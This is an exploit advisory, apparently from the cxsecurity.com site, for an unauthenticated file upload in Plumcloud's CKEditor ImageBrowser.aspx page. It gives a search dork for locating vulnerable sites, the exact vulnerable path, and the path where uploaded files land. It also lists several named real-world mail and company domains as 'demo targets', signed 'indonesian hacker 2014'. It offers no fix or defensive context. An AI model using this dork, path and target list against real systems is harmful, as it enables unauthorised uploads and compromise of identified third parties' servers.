Plumcloud Image Browser File Upload

2022.07.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================== Exploit Title: Plumcloud Image Browser File Upload Exploit Author: L4663r666h05t Twitter: https://twitter.com/L4663r666h05t Vendor Homepage: https://plumcloud.com Dork: "©2014 PlumCloud. All Rights Reserved." Exploit: /_common_CS_v6/aspx/ckeditor/ImageBrowser.aspx ==================================================== Then try http://mail.mhc.com.mt/_common_CS_v6/aspx/ckeditor/ImageBrowser.aspx Demo Target: mail.mhc.com.mt mail.plumcloud.com mx01.cbuzu.com mx01.maltait.com mx01.melitaunipol.com mx01.muia.com.mt mx01.muib.com.mt plumcloud.com plumcloud.net File/Images path: /uploads/ckeditor/images/yourfile.jpg ==================================================== indonesian hacker 2014 ====================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top